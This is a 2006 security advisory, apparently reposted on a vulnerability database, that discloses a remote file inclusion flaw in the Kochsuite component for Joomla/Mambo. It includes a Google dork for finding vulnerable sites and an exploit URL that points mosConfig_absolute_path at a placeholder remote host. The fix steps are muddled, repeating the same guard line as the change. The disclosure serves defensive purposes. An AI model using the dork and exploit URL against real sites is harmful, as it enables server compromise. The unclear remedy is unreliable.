Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13957
HistoryAug 21, 2006 - 12:00 a.m.

Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote File Inclusion Vulnerability

2006-08-2100:00:00
vulners.com
57
.:[ insecurity research team ]:.
 .__..____.:.______.____.:.____ .

.:. | |/ \:/ // __ \:/ \.:.
: | | | \\
\\ /\ / :. .
…: |
|| /__ >\___ >\___ >.:
.:… … .\/ .:\/:. .\/. .:\/:
. …:. .advisory. .:…
:…: 18.o8.2oo6 …

Affected Application: Kochsuite v0.9.4

   (Mambo/Joomla CMS Component)

. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

Discoverd by: camino

Team: Insecurity Research Team

URL: http://www.insecurityresearch.org

E-Mail: camino[at]sexmagnet[dot]com

. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .

Typ: Remote [x] Local [ ]

   Remote File Inclusion [x]  SQL Injection [ ]

Level: Low [ ] Middle [x] High [ ]

Application: Kochsuite

Version: 0.9.4

Vulnerable File: config.kochsuite.php

URL: http://www.vegisto.com

Description: It's a component for chiefs to publish theirs stuff…

Dork: inurl:"com_kochsuite"

. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/

config.kochsuite.php?mosConfig_absolute_path=http://huh?

. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .

o1.) open config.kochsuite.php

o2.) take a look at line 46:

     # Don't allow direct linking    defined( '_VALID_MOS' ) or 

     die( 'Direct Access to this location is not allowed.' );

o3.) take a look at line 47:

     require_once ($mosConfig_absolute_path.'/administrator/

     components/com_kochsuite/includes/letters.inc');

o4.) change line 46:

     defined( '_VALID_MOS' ) or 

     die( 'Direct Access to this location is not allowed.' );

. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .

my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members

of insecurity research team ;-)